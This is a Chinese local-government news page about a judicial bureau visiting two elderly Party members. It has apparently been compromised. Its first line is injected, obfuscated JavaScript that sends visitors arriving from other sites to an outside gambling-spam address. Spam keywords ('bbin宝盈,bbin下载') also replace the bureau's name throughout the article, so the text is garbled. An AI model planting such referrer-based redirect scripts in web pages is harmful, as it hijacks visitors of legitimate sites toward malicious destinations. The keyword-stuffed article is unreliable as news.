var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

bbin宝盈,bbin下载

您的当前位置:首页 > 媒体聚焦
发布日期:2019-10-11 浏览次数: 字号:[ ]

李大成向慰问人员展示“庆祝中华人民共和国成立70周年纪念章”

日前,bbin宝盈,bbin下载:司法局走访慰问了97岁和91岁高龄的李大成和张国祥两位老党员,与他们共同学习《习近平关于“不忘初心、牢记使命”论述摘编》、党章等主题教育学习书籍,向老党员通报了全局“不忘初心、牢记使命”主题教育工作开展情况,征求他们对主题教育工作开展的意见和建议,并细心了解了他们近期的生活情况。

据了解,为确保主题教育学习全覆盖,切实加强对离退休老党员的学习教育,深化党内关心关爱工作,bbin宝盈,bbin下载:司法局积极为老党员开展“送学上门”活动,助力主题教育活动深入开展。

李大成是嘉兴老一代律师,张国祥老人是bbin宝盈,bbin下载:司法局成立以来第一任人事科科长。两位老党员热爱党、热爱祖国、热爱学习,平时勤看党报,关心时事政治,养成了勤做笔记、爱写心得体会的学习习惯。近日,李大成被光荣授予“庆祝中华人民共和国成立70周年纪念章”。

“通过‘送学上门’活动,与老党员们真诚地进行面对面交流,让他们足不出户了解党的最新方针政策,使老党员们进一步感受到了党组织的关怀,激发老党员们‘不忘初心、牢记使命’,不断加强学习,为全市司法行政事业发展奉献自己的光和热。”bbin宝盈,bbin下载:司法局相关负责人说。

记者 万笑影 通讯员 林佳




打印本页 关闭窗口
Produced By 大汉网络 大汉版通发布系统